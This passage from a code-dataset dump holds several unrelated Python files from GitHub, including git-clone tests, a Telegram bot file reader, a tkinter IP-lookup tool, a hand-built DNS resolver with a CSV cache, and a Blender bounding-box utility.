mock_clone_from.assert_not_called()\n\n @patch('repository.git.Repo.clone_from')\n def 
test_clone_github_repository_fails(self, mock_clone):\n mock_clone.side_effect = GitCommandError(\"clone\", \"error\")\n\n with self.assertRaises(RepoNotValidException):\n clone_github_repository(self.repo_url, self.destination_dir)\n\n @patch('repository.git.Repo.clone_from')\n def test_clone_github_repository_invalid_url(self, mock_clone):\n # Test cloning with an invalid repository URL\n mock_clone.side_effect = InvalidGitRepositoryError(\"clone\", \"error\")\n\n with self.assertRaises(RepoNotValidException):\n clone_github_repository(\"invalid_url\", self.destination_dir)\n\n @patch('repository.github.git')\n def test_checkout_to_commit(self, mock_git):\n expected_calls = [call.Repo(), call.Repo(self.destination_dir), call.Repo().git.checkout(self.commit_hash)]\n mock_git.Repo().return_value = Mock()\n\n checkout_to_commit(self.destination_dir, self.commit_hash)\n\n mock_git.assert_has_calls(expected_calls)\n\n @patch('repository.github.git')\n def test_checkout_to_commit_invalid_commit(self, mock_git):\n mock_git.Repo().return_value = Mock()\n mock_git.Repo().git.checkout.side_effect = GitCommandError(\"checkout\", \"error\")\n\n with self.assertRaises(CommitNotValidException):\n checkout_to_commit(self.destination_dir, \"invalid_commit_hash\")\n","repo_name":"jonathansantilli/snyk-report-commit-matcher","sub_path":"tests/repository/test_github.py","file_name":"test_github.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72446556953","text":"#Biseksi mencari akar\n\nx = float(raw_input('masukkan angka: ')) #pengguna meng-input-kan angka yang akarnya akan dicari\nepsilon = 0.01 #nilai eror yang diinginkan\nbanyaktebakan = 0 #inisialisasi banyaknya tebakan\natas = x #batas atas dari rentang\nbawah = 0.0 #batas bawah dari rentang\nakar = (atas + bawah)/2.0 #nilai tengah dari rentang atau nilai akar kuadrat\nwhile abs(akar**2 - x) >= epsilon: #lakukan algoritma biseksi selama eror lebih besar atau sama dengan nilai epsilon\n print ('bawah = ' + str(bawah) + ' atas = ' + str(atas) + ' akar = ' + str(akar))\n banyaktebakan += 1 #pengitunga jumlah tebakan yang dilakukan\n if akar**2 > x: #pengujian untuk memilih rentang\n atas = akar\n else:\n bawah = akar\n akar = (bawah + atas)/2.0 #nilai akar kuadrat\nprint ('banyak tebakan = ' + str(banyaktebakan))\nprint (str(akar) + ' mendekati akar dari ' + str(x))\n","repo_name":"bagustris/lpthw","sub_path":"biseksi.py","file_name":"biseksi.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29911547672","text":"from typing import Optional\nfrom aiogram import types\nimport csv\nimport email\nimport os\nimport asyncio\nimport aiogram.types as types\nimport docx\nimport openpyxl\nimport pptx\nimport pypdf\nfrom bs4 import BeautifulSoup\nclass FileTranscript:\n \"\"\"\n The FileTranscript class is responsible for reading and downloading various types of files,\n such as text documents, spreadsheets, presentations, emails, and more.\n \"\"\"\n\n VALID_EXTENSIONS = [\n \"txt\", \"rtf\", \"md\", \"html\", \"xml\", \"csv\", \"json\", \"js\", \"css\", \"py\", \"java\", \"c\",\n \"cpp\", \"php\", \"rb\", \"swift\", \"sql\", \"sh\", \"bat\", \"ps1\", \"ini\", \"cfg\", \"conf\", \"log\",\n \"svg\", \"epub\", \"mobi\", \"tex\", \"docx\", \"odt\", \"xlsx\", \"ods\", \"pptx\", \"odp\", \"eml\",\n \"htaccess\", \"nginx.conf\", \"pdf\"\n ]\n\n async def 
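The bisection script above is commented in Indonesian; in English, it halves the bracket [0, x] until the midpoint squared is within epsilon of x, counting the guesses as it goes. The same routine as a function, with the bracket widened to max(1, x) so that inputs between 0 and 1 (where sqrt(x) > x) also converge:

def bisect_sqrt(x, epsilon=0.01):
    low, high = 0.0, max(1.0, x)
    guesses = 0
    root = (low + high) / 2.0
    while abs(root * root - x) >= epsilon:
        guesses += 1
        if root * root > x:
            high = root       # answer lies in the lower half
        else:
            low = root        # answer lies in the upper half
        root = (low + high) / 2.0
    return root, guesses

print(bisect_sqrt(25.0))      # roughly (5.0, <guess count>)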
read_document(self, filename: str) -> str:\n \"\"\"\n Reads the contents of a document file based on its extension.\n\n Args:\n filename (str): The name of the file to read.\n\n Returns:\n str: The contents of the file.\n \"\"\"\n try:\n extension = filename.split(\".\")[-1]\n contents = \"\"\n\n if extension not in self.VALID_EXTENSIONS:\n return \"Invalid document file\"\n\n if extension == \"pdf\":\n with open(filename, \"rb\") as f:\n pdf_reader = pypdf.PdfReader(f)\n num_pages = len(pdf_reader.pages)\n for page_num in range(num_pages):\n page_obj = pdf_reader.pages[page_num]\n page_text = page_obj.extract_text()\n contents += page_text\n\n elif extension == \"docx\":\n doc = docx.Document(filename)\n contents = \"\\n\".join([paragraph.text for paragraph in doc.paragraphs])\n\n elif extension in [\"xlsx\", \"ods\"]:\n workbook = openpyxl.load_workbook(filename, read_only=True)\n sheet = workbook.active\n for row in sheet.iter_rows(values_only=True):\n contents += \"\\t\".join([str(cell_value) for cell_value in row]) + \"\\n\"\n\n elif extension in [\"pptx\", \"odp\"]:\n presentation = pptx.Presentation(filename)\n for slide in presentation.slides:\n for shape in slide.shapes:\n if hasattr(shape, \"text\"):\n contents += shape.text + \"\\n\"\n\n elif extension == \"eml\":\n with open(filename, \"r\") as f:\n msg = email.message_from_file(f)\n for part in msg.walk():\n if part.get_content_type() == \"text/plain\":\n contents += part.get_payload()\n\n elif extension in [\"html\", \"xml\"]:\n with open(filename, \"r\") as f:\n soup = BeautifulSoup(f, \"html.parser\")\n contents = soup.get_text()\n\n elif extension == \"csv\":\n with open(filename, \"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n contents += \"\\t\".join(row) + \"\\n\"\n\n else:\n with open(filename, \"r\") as f:\n contents = f.read()\n\n except Exception as e:\n contents = f\"Error during file download: {str(e)}\"\n\n return contents\n\n async def download_file(self, bot, message: types.Message) -> Optional[str]:\n \"\"\"\n Downloads a file from a Telegram message.\n\n Args:\n bot: The bot instance.\n message (types.Message): The Telegram message containing the file.\n\n Returns:\n Optional[str]: The full file path of the downloaded file, or None if there was an error.\n \"\"\"\n try:\n if message.document is None:\n return None\n\n file = message.document\n file_extension = file.file_name.split(\".\")[-1] if file.file_name else \"\"\n file_path = f\"{file.file_id}.{file_extension}\"\n file_dir = \"downloaded_files\"\n os.makedirs(file_dir, exist_ok=True)\n full_file_path = os.path.join(file_dir, file_path)\n await bot.download(file=file, destination=full_file_path)\n return full_file_path\n\n except Exception as e:\n print(f\"Error during file download: {str(e)}\")\n return None","repo_name":"noes14155/Telegrambot-with-GPT","sub_path":"bot/file_transcript.py","file_name":"file_transcript.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"5"} +{"seq_id":"7622877386","text":"\"\"\"\nCustomized log configuration\n\"\"\"\nimport inspect\nimport logging\nimport sys\n\n# Originally from https://github.com/hima03/log-decorator.git\n# Modified for my own preferences.\n\n\nclass CustomFormatter(logging.Formatter): # pragma: no cover\n \"\"\"Custom Formatter does these 2 things:\n 1. Overrides 'funcName' with the value of 'func_name_override', if it exists.\n 2. 
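read_document() above is a coroutine, so plain-file use goes through an event loop; "notes.txt" is a placeholder name here:

import asyncio

async def main():
    transcript = FileTranscript()
    text = await transcript.read_document("notes.txt")
    print(text[:200])

asyncio.run(main())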
Overrides 'filename' with the value of 'file_name_override', if it exists.\n \"\"\"\n\n def format(self, record) -> str: # pragma: no cover\n if hasattr(record, \"func_name_override\"):\n record.funcName = record.func_name_override\n if hasattr(record, \"file_name_override\"):\n record.filename = record.file_name_override\n if hasattr(record, \"module\"):\n record.module = record.file_name_override.rstrip(\".py\")\n return super(CustomFormatter, self).format(record)\n\n\ndef get_logger() -> logging.Logger: # pragma: no cover\n \"\"\"Customizes and returns a Logger object.\n Set the formatter of 'CustomFormatter' type as we want to log base function name\n and base file name\n \"\"\"\n\n # Create logger object and set the format for logging and other attributes\n logger = logging.Logger(f\"{__package__}.{inspect.stack()[2][3]}\")\n if logger.getEffectiveLevel() != logging.getLogger(__package__).getEffectiveLevel():\n logger.setLevel(logging.getLogger(__package__).getEffectiveLevel())\n\n handler = logging.StreamHandler(stream=sys.stderr)\n\n handler.setFormatter(\n # CustomFormatter(\n # \"%(asctime)s:%(levelname)-10s:%(filename)s:%(funcName)s:%(message)s\"\n # )\n CustomFormatter(\n \"[%(asctime)s] - %(module)s:%(funcName)s - %(levelname)s - %(message)s\"\n )\n )\n logger.addHandler(handler)\n\n # Return logger object\n return logger\n","repo_name":"kronenpj/pinochle","sub_path":"src/pinochle/custom_log.py","file_name":"custom_log.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72991689432","text":"#this programme used to find out server address of any ip and uses tkinter gui\n#information will be accessed via ip-api.com\nfrom tkinter import*\nimport requests\nfrom requests import get\nimport socket\nimport xml.etree.ElementTree as ET\nfrom tkinter import messagebox\ncount=0\nmyText=None\nroot=None\nresult=None\nget_info=None\ntags=None\nentryBox=None\ntemp_lebel=None\n#button2 was just testing purpose only and no need to use\ndef button2():\n global myText\n global count\n count+=1\n myText.set(count)\ndef addchlbl(root):\n global myText\n myText=StringVar()\n myText.set(\"\")\n myLabel=Label(root,textvariable=myText)\n myLabel.pack()\ndef info(ip_address):\n global get_info\n get_info=requests.request(\"GET\",\"http://ip-api.com/xml/\"+ip_address)\n global tags\n tags=ET.fromstring(get_info.text)\n #messagebox.showinfo(\"incomeing info\",\"information received\")\ndef button_host():\n #global temp_lebel\n myText=\"\"\n ip_address=get(\"http://ipapi.co/ip\")\n ip_address=ip_address.text\n info(ip_address)\n temp_lebel=Label(root,text='\\n'.join(''.join(i.text) for i in tags))\n #temp_lebel=Label(root,text=myText)\n temp_lebel.pack()\n #messagebox.showinfo(\"incomeing info\",'\\n'.join(i.tag.join('').join(i.text) for i in tags))\n '''for i in tags:\n print (i.tag,i.text)'''\ndef button_address():\n global entryBox\n #global temp_lebel\n text=entryBox.get()\n ip_address=socket.gethostbyname(text)\n info(ip_address)\n #temp_lebel=Label(root,text='\\n'.join(''.join(i.text) for i in tags))\n for i in tags:\n temp_lebel=Label(root,text=i.text)\n temp_lebel.pack()\ndef input_box(x):\n global entryBox\n entryBox=Entry(x)\n entryBox.pack()\ndef main():\n root=Tk()\n root.title(\"Server information\")\n w=Label(root,text=\"Input a web address or for finding network info input 'host' without quotes\")\n host_button=Button(root,text=\"Host ip info\",command=button_host)\n 
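The func_name_override/file_name_override attributes that CustomFormatter checks are ordinary logging extras, normally injected by a log decorator but settable by hand as below. One caveat observed in the formatter itself: rstrip(".py") strips trailing '.', 'p' and 'y' characters rather than the suffix, so a name like "copy.py" becomes "co"; removesuffix(".py") would be the exact operation.

def wrapped():
    # get_logger() walks two frames up the stack for its name, so it must be
    # called from inside a function, not at module top level.
    log = get_logger()
    log.info("call finished",
             extra={"func_name_override": "original_func",
                    "file_name_override": "caller_module.py"})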
address_button=Button(root,text=\"Address info\",command=button_address)\n w.pack()\n host_button.pack()\n w=Label(root,text=\"or\").pack()\n input_box(root)\n address_button.pack()\n addchlbl(root)\n changed_button=Button(root,text=\"click\",command=button2).pack()\n root.mainloop()\nmain()\n","repo_name":"tomal123bd/Programming","sub_path":"Finding_Server_info_GUI.py","file_name":"Finding_Server_info_GUI.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35080094747","text":"import binascii\nimport socket\nimport sys\nimport time\nimport csv\n\n\n\ndef message_creator(address):\n #Create a udpacket to send\n message = \"\"\n parameters = \"\"\n ID = 43960 #Identifier 16bit\n message += \"{:04x}\".format(ID)\n QR = 0 #QR 0 for querry 1 bit\n parameters += str(QR)\n OPCODE = 0 #4 bit\n parameters += str(OPCODE).zfill(4)\n AA = 0 #1 bit\n parameters += str(AA)\n TC = 0 #1bit\n parameters += str(TC)\n RD = 0 #1 bit\n parameters += str(RD)\n RA = 0 #1 bit\n parameters += str(RA)\n Z = 0 #3bit\n parameters += str(Z).zfill(3)\n RCODE = 0 #4bit\n parameters += str(RCODE).zfill(4)\n values = \"{:04x}\".format(int(parameters, 2))\n message += values\n #All of them are 4 bits\n Qd_count = 1\n message += \"{:04x}\".format(Qd_count)\n An_count = 0\n message += \"{:04x}\".format(An_count)\n Ns_count = 0\n message += \"{:04x}\".format(Ns_count)\n Ar_count = 0\n message += \"{:04x}\".format(Ar_count)\n z =\"{:04x}\".format(Ar_count)\n #Formatting the address\n splitted_address = address.split(\".\")\n for ady in splitted_address:\n length = \"{:02x}\".format(len(ady))\n message +=length\n encoded_part = binascii.hexlify(ady.encode())\n message += encoded_part.decode()\n\n message += \"00\" # Terminating bit for QNAME\n message += \"{:04x}\".format(1)\n QCLASS = 1\n message += \"{:04x}\".format(QCLASS)\n return message\n\ndef http_decoder(data):\n # Parsing the header section\n header_section = binascii.hexlify(data[0:12]).decode(\"utf-8\")\n ID_message = header_section[0:4]\n Flags_message = header_section[4:8]\n Question_number = int(header_section[8:12], 16)\n Answer_RRs = int(header_section[12:16], 16)\n Authority_RRs = int(header_section[16:20], 16)\n Additional_RRs = int(header_section[20:24], 16)\n\n # Query_Section\n query_section = binascii.hexlify(data[12:25]).decode(\"utf-8\")\n z = 12\n while (1):\n if (binascii.hexlify(data[z:z + 1]).decode(\"utf-8\") != \"00\"):\n z += 1\n else:\n break\n z += 5\n looped = 0\n stored_https = list()\n stored_ttl = list()\n stored_time = list()\n # Parsing the Answer Section\n while (1):\n start = time.time()\n answer_section = binascii.hexlify(data[z:z + 16]).decode(\"utf-8\")\n domain_name = answer_section[0:4]\n host_type = answer_section[4:8]\n host_class = answer_section[8:12]\n host_time_leave = answer_section[12:20]\n data_len = answer_section[20:24]\n ip = answer_section[24:32]\n # parse the ip\n ip_parse = \"\"\n ip_i = 0\n while (1):\n y = ip[ip_i:ip_i + 2]\n x = int((y), 16)\n ip_parse += str(x) + \".\"\n ip_i += 2\n if (ip_i + 2 > len(ip)):\n ip_parse = ip_parse[0:int(len(ip_parse)) - 1]\n break\n total_time = time.time() - start #time in seconds\n total_time = total_time * 1000 #time in ms\n stored_https.append(ip_parse)\n stored_ttl.append(int(host_time_leave,16))\n stored_time.append(total_time)\n z += 16\n looped += 1\n if (looped >= Answer_RRs):\n break\n\n\n return stored_https, stored_ttl, stored_time\n\ndef message_decoder(data):\n 
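message_creator() above assembles the 12-byte DNS header by concatenating hex strings. An equivalent, and less error-prone, construction packs the six 16-bit header fields directly; 0xABB8 is the same 43960 identifier, and all flag bits stay zero for a standard query:

import struct

def dns_header(qdcount=1):
    # id, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT as big-endian uint16s
    return struct.pack(">HHHHHH", 0xABB8, 0x0000, qdcount, 0, 0, 0)

assert dns_header().hex() == "abb8" + "0000" + "0001" + "0000" + "0000" + "0000"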
#Parsing the header section\n header_section = binascii.hexlify(data[0:12]).decode(\"utf-8\")\n ID_message = header_section[0:4]\n Flags_message = header_section[4:8]\n Question_number = int(header_section[8:12], 16)\n Answer_RRs = int(header_section[12:16], 16)\n Authority_RRs = int(header_section[16:20], 16)\n Additional_RRs = int(header_section[20:24], 16)\n\n # Query_Section\n query_section = binascii.hexlify(data[12:25]).decode(\"utf-8\")\n\n # leave question\n z=12\n while(1):\n if (binascii.hexlify(data[z:z+1]).decode(\"utf-8\") != \"00\"):\n z+= 1\n else:\n break\n z+=5\n looped = 0\n\n\n while(1):\n resource_name = binascii.hexlify(data[z:z+2]).decode(\"utf-8\")\n\n server_type = binascii.hexlify(data[z+2:z+4]).decode(\"utf-8\")\n server_class = binascii.hexlify(data[z+4:z+6]).decode(\"utf-8\")\n res_time_leave = int(binascii.hexlify(data[z+8:z+10]).decode(\"utf-8\"),16)\n res_len = int(binascii.hexlify(data[z+10:z+12]),16)\n # res_ip = data[data+24:data+24+res_len]\n z += 12 + res_len\n looped += 1\n if(looped >= Authority_RRs):\n break\n looped = 0\n while(1):\n name_resource = binascii.hexlify(data[z:z+2]).decode(\"utf-8\")\n type_server = binascii.hexlify(data[z+2:z+4]).decode(\"utf-8\")\n type_class = binascii.hexlify(data[z+4:z+6]).decode(\"utf-8\")\n ttl_res = int(binascii.hexlify(data[z+8:z+10]).decode(\"utf-8\"),16)\n len_res = int(binascii.hexlify(data[z+10:z+12]),16)\n z += 12\n #skip AAAAs\n if(type_server == \"001c\"):\n z += len_res\n continue\n res_ip = binascii.hexlify(data[z:z+len_res]).decode(\"utf-8\")\n z += len_res\n if(type_server != \"001c\"):\n break\n if(looped >= Additional_RRs):\n break\n\n ip_parse = \"\"\n ip_i = 0\n while (1):\n y = res_ip[ip_i:ip_i + 2]\n x = int((y), 16)\n ip_parse += str(x) + \".\"\n ip_i += 2\n if (ip_i + 2 > len(res_ip)):\n ip_parse = ip_parse[0:int(len(ip_parse)) - 1]\n break\n\n\n return ip_parse\nRoot_servers = [\"198.41.0.4\", \"199.9.14.201\", \"192.33.4.12\", \"199.7.91.13\", \"192.203.230.10\",\n\"192.5.5.241\",\"192.112.36.4\", \"198.97.190.53\", \"192.36.148.17\", \"192.58.128.30\",\n\"193.0.14.129\", \"199.7.83.42\", \"202.12.27.33\"]\nhost = sys.argv[1]\naddress = host\nmessage = message_creator(address)\nmessage = message.replace(\" \", \"\").replace(\"\\n\", \"\")\nprint(\"Domain: \", host)\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n for i in range(len(Root_servers)):\n start_time = time.time()\n sock.sendto(binascii.unhexlify(message), (Root_servers[i],53))\n sock.settimeout(10)\n try:\n data, _ = sock.recvfrom(4096)\n tld_ip = message_decoder(data)\n total_time = time.time() - start_time # time in seconds\n total_time = total_time * 1000 # convert time to ms\n print(\"Root Ip: \", Root_servers[i])\n print(\"time to root: \", total_time, \" ms\")\n break\n except:\n print(\"timeout\")\n continue\nsock.close()\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n start_time = time.time()\n sock.sendto(binascii.unhexlify(message), (tld_ip,53))\n sock.settimeout(10)\n data, _ = sock.recvfrom(4096)\n aut_ip = message_decoder(data)\n total_time = time.time() - start_time # time in seconds\n total_time = total_time * 1000 # convert time to ms\n print(\"TLD IP: \",tld_ip)\n print(\"time to TLD: \", total_time, \" ms\")\n\nsock.close()\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:\n start_time = time.time()\n sock.sendto(binascii.unhexlify(message), (aut_ip,53))\n sock.settimeout(10)\n data, _ = sock.recvfrom(4096)\n http, ttl, times = http_decoder(data)\n total_time = 
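message_decoder() above reads each answer's name as a fixed two-byte field, which only holds because servers respond with compression pointers: a name field whose first two bits are 11 is a two-byte pointer back into the message (RFC 1035 §4.1.4) rather than an inline label sequence. A robust parser would check for that case explicitly:

def is_compression_pointer(data, offset):
    # 0xC0 mask: top two bits set marks a 14-bit pointer into the packet.
    return (data[offset] & 0xC0) == 0xC0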
time.time() - start_time # time in seconds\n total_time = total_time * 1000 # convert time to ms\n print(\"aut IP: \",aut_ip)\n print(\"time to aut: \", total_time, \" ms\")\n\n\n\ndef csv_checker(ip):\n with open('partcCaches.csv', 'r+') as f:\n temp_csv = []\n writer = csv.writer(f)\n f.seek(0)\n for row in f:\n csv_row = row.strip('\\n').split(',')\n for x in range(len(csv_row)):\n if (ip == csv_row[1]):\n f.close()\n return True\n return False\n\n# open the file in the write mode\ncsv_list = []\ntry:\n with open('partcCaches.csv', 'r', newline='') as f:\n f.close()\nexcept:\n with open('partcCaches.csv', 'w', newline='') as f:\n f.close()\n\nfor i in range(len(http)):\n temp_list = [host]\n temp_list.append(http[i])\n temp_list.append(ttl[i])\n temp_list.append(time.time())\n csv_list.append(temp_list)\nfor i in range(len(csv_list)):\n flag = 0\n flag = csv_checker(csv_list[i][1])\n if(flag == True):\n continue\n else:\n with open('partcCaches.csv', 'a', newline='') as f:\n write_time = time.time()\n writer = csv.writer(f)\n writer.writerow(csv_list[i])\n f.close()\n\n\nsock.close()\n","repo_name":"ekbostan/Socket-Programming-DNS","sub_path":"DNS-Cache.py","file_name":"DNS-Cache.py","file_ext":"py","file_size_in_byte":8491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32472239279","text":"from operator import itemgetter\nfrom PIL import Image, ImageTk\nimport json\n\n\nclass ImageHandler:\n def resize_image(self, image):\n # Use the original aspect ratio of the image to resize\n if image.height > 300:\n aspect_ratio = image.width / image.height\n new_width = aspect_ratio * 300\n return image.resize((int(new_width), 300), Image.Resampling.LANCZOS)\n\n if image.width > 500:\n aspect_ratio = image.width / image.height\n new_height = 500 * aspect_ratio\n return image.resize((500, int(new_height)), Image.Resampling.LANCZOS)\n\n return image\n\n def display_image(self):\n\n languageFile = open(\"Image_Viewer/lang/en-GB.json\")\n lang = json.load(languageFile)\n labels = itemgetter(\"labels\")(lang)\n\n try:\n self.name_label.configure(\n text=self.image_files[self.current_image_index])\n new_img = Image.open(\n f\"{self.img_dir}/{self.image_files[self.current_image_index]}\")\n self.current_image = ImageTk.PhotoImage(self.resize_image(new_img))\n self.display.configure(image=self.current_image)\n\n except OSError as e:\n self.name_label.configure(text=e)\n self.current_image = ImageTk.PhotoImage(self.blank_img)\n self.display.configure(image=self.current_image)\n\n except IndexError:\n self.name_label.configure(text=labels[\"no_image\"])\n self.current_image = ImageTk.PhotoImage(self.blank_img)\n self.display.configure(image=self.current_image)\n","repo_name":"cBridges851/tkinter-image-viewer","sub_path":"Image_Viewer/image_handler.py","file_name":"image_handler.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"25756005986","text":"class Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n l, r = -1, 0\n visit = defaultdict(bool)\n \n while r < len(nums):\n if not visit[nums[r]]:\n l += 1\n nums[l] = nums[r]\n visit[nums[r]] = True\n r += 1\n \n return l + 
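The defaultdict-based scan above works on any array, but LeetCode 26 guarantees sorted input, so comparing each element with the last one kept gives the same two-pointer result in O(1) extra space:

from typing import List

def remove_duplicates_sorted(nums: List[int]) -> int:
    write = 0
    for read in range(len(nums)):
        if write == 0 or nums[read] != nums[write - 1]:
            nums[write] = nums[read]
            write += 1
    return write       # nums[:write] holds the unique prefix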
1","repo_name":"HaolinZhong/LeetCode","sub_path":"0026-remove-duplicates-from-sorted-array/0026-remove-duplicates-from-sorted-array.py","file_name":"0026-remove-duplicates-from-sorted-array.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20363376529","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n# @Version: Python 3.11.4\n# @Software: Sublime Text 4\n# @Author: StudentCWZ\n# @Email: StudentCWZ@outlook.com\n# @Date: 2023-01-06 10:08:00\n# @Last Modified by: StudentCWZ\n# @Last Modified time: 2023-01-06 11:29:29\n# @Description: 服务启动文件\n\"\"\"\n\nfrom application import create_app\n\napp = create_app()\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"StudentCWZ/pyfly","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"33311753493","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import adjusted_rand_score\n\n\nclass TextMiner(object):\n \"\"\"\n\tGets related words based on a list of texts and the query\n\n\tKMeans normally works with numbers only: we need to have numbers. \n\tTo get numbers, we do a common step known as feature extraction.\n\tThe feature used is TF-IDF, a numerical statistic. \n\tThis statistic uses term frequency and inverse document frequency. \n\tIn short: we use statistics to get to numerical features.\n\n\tThe method TfidfVectorizer() implements the TF-IDF algorithm. \n\tBriefly, the method TfidfVectorizer converts a collection of raw \n\tdocuments to a matrix of TF-IDF features\n\n\tAfter we have numerical features, we initialize the KMeans algorithm \n\twith K=number of documents.\n\tthen print the top words per cluster\n\n\t\"\"\"\n\n def get_cluster_terms(self, query, documents):\n # print(documents)\n prediction_list = []\n vectorizer = TfidfVectorizer(\n stop_words=\"english\"\n ) # converts a collection of raw documents to a matrix of TF-IDF features\n # print(vectorizer)\n X = vectorizer.fit_transform(\n documents\n ) # Learn vocabulary and idf, return term-document matrix.\n # print(X)\n true_k = len(documents)\n print(true_k)\n model = KMeans(n_clusters=true_k, init=\"k-means++\", max_iter=100, n_init=1)\n model.fit(X) # Compute K-Means Clustering\n order_centroids = model.cluster_centers_.argsort()[:, ::-1]\n terms = vectorizer.get_feature_names()\n \"\"\"\n\t\tfor i in range(true_k):\n\t\t\tprint(\"Cluster %d:\" % i),\n\t\t\tfor ind in order_centroids[i, :5]:\n\t\t\t\tprint(' %s' % terms[ind]),\n\t\t\"\"\"\n Y = vectorizer.transform(\n [query]\n ) # Prediction to figure out which cluster the query belongs\n prediction = model.predict(\n Y\n ) # Predict the closest cluster each sample in X belongs to.\n for ind in order_centroids[int(prediction), :8]:\n prediction_list.append(terms[ind])\n return prediction_list\n\n\n\"\"\"\t\t\nprint(TextMiner().get_cluster_terms(\"devices\", [\"This little kitty came to play when I was eating at a restaurant.\",\n\"Merley has the best squooshy kitten belly.\",\n\"Google Translate app is incredible.\",\n\"If you open 100 tab in google you get a smiley face.\",\n\"Best cat photo I've ever taken.\",\n\"Climbing ninja cat.\",\n\"Impressed with google map feedback.\",\n\"Key promoter extension for Google Chrome.\"])) 
\n\"\"\"\n","repo_name":"rotherfordm/theology-library-search-engine","sub_path":"app/textmining.py","file_name":"textmining.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13842918846","text":"#!/usr/bin/python3\r\n# copyright (c) 2018- polygoniq xyz s.r.o.\r\n\r\nimport bpy\r\nimport numpy\r\nimport unittest\r\nimport mathutils\r\n\r\n\r\nclass WorldBoundingBox:\r\n \"\"\"Bounding box that operates with world space coordinate system.\r\n\r\n If WorldBoundingBox is extended by object then min_x, max_x,... values are in world space,\r\n not object local space. When object moves after initialization of WorldBoundingBox,\r\n coordinate properties are not recomputed to match new object's position - this class does not\r\n store any reference to initialization objects.\r\n WorldBoundingBox computes boundaries even for instanced collection objects, that's advantage\r\n compared to bound_box property of bpy.types.Object.\r\n \"\"\"\r\n\r\n def extend_by_point(self, point: mathutils.Vector):\r\n self.min_x = min(self.min_x, point.x)\r\n self.max_x = max(self.max_x, point.x)\r\n self.min_y = min(self.min_y, point.y)\r\n self.max_y = max(self.max_y, point.y)\r\n self.min_z = min(self.min_z, point.z)\r\n self.max_z = max(self.max_z, point.z)\r\n\r\n def extend_by_object(self, obj: bpy.types.Object,\r\n parent_collection_matrix: mathutils.Matrix = mathutils.Matrix.Identity(4)):\r\n # matrix_world is matrix relative to object's blend.\r\n # Thus collection objects have offset inside colllection defined by their matrix_world.\r\n # We need to multiply parent_collection_matrix by obj.matrix_world in recursion\r\n # to get matrix relevant to top-most collection world space.\r\n obj_matrix = parent_collection_matrix @ obj.matrix_world\r\n # if object is a collection, it has bounding box ((0,0,0), (0,0,0), ...)\r\n # we need to manually traverse objects from collections and extend main bounding box\r\n # to contain all objects\r\n if obj.instance_type == 'COLLECTION':\r\n collection = obj.instance_collection\r\n for collection_obj in collection.objects:\r\n self.extend_by_object(collection_obj, obj_matrix)\r\n else:\r\n for corner in obj.bound_box:\r\n self.extend_by_point(obj_matrix @ mathutils.Vector(corner))\r\n\r\n def __init__(self, min_x: float = float(\"inf\"), max_x: float = float(\"-inf\"),\r\n min_y: float = float(\"inf\"), max_y: float = float(\"-inf\"),\r\n min_z: float = float(\"inf\"), max_z: float = float(\"-inf\")):\r\n self.min_x = min_x\r\n self.max_x = max_x\r\n self.min_y = min_y\r\n self.max_y = max_y\r\n self.min_z = min_z\r\n self.max_z = max_z\r\n\r\n def get_eccentricity(self):\r\n \"\"\"Returns relative eccentricity in each axis.\r\n \"\"\"\r\n return mathutils.Vector((\r\n (self.max_x - self.min_x) / 2.0,\r\n (self.max_y - self.min_y) / 2.0,\r\n (self.max_z - self.min_z) / 2.0\r\n ))\r\n\r\n def get_center(self):\r\n return mathutils.Vector((self.min_x, self.min_y, self.min_z)) + self.get_eccentricity()\r\n\r\n def __str__(self):\r\n return (\r\n f\"Bounding box \\n\"\r\n f\"X = ({self.min_x}, {self.max_x}) \\n\"\r\n f\"Y = ({self.min_y}, {self.max_y}) \\n\"\r\n f\"Z = ({self.min_z}, {self.max_z})\"\r\n )\r\n\r\n\r\ndef plane_from_points(points):\r\n assert len(points) == 3\r\n p1, p2, p3 = points\r\n\r\n v1 = p3 - p1\r\n v2 = p2 - p1\r\n\r\n normal = numpy.cross(v1, v2)\r\n normal_magnitude = numpy.linalg.norm(normal)\r\n normal /= normal_magnitude\r\n offset = 
